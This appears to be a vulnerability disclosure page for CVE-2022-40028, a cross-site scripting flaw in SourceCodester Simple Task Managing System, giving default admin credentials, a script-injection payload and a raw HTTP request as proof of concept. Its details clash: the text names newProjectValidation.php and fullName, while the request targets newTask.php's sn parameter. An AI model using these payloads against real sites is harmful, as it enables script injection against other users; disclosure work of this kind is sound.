Headline
CVE-2022-40028: CVE_HUNTER/2022-09-01-XSS2.md at main · xidaner/CVE_HUNTER
SourceCodester Simple Task Managing System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component newProjectValidation.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fullName parameter.
Simple Task Managing System - XSS2
A vulnerability classified as problematic was found in SourceCodester Simple Task Managing System. This vulnerability affects unknown code. The manipulation of the argument newProjectValidation.php leads to cross site scripting. The attack can be initiated remotely.
username:admin password:admin ----> {ip}/newProjectValidation.php
Supplier: https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html
/newProjectValidation.php has XSS
Payload: "><ScRiPt>alert(1)</sCrIpT>
XSS because $full can be closed
Payload
GET http://localhost/cve/Task%20Managing%20System%20in%20PHP/newTask.php?sn=%3CsCrIpT%3Ealert(1)%3C/sCrIpT%3E HTTP/1.1 Host: localhost Cache-Control: max-age=0 sec-ch-ua: ";Not A Brand";v="99", “Chromium";v="94” sec-ch-ua-mobile: ?0 sec-ch-ua-platform: “Windows” Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=34a9idaoj7m7miduqt31hupisn Connection: close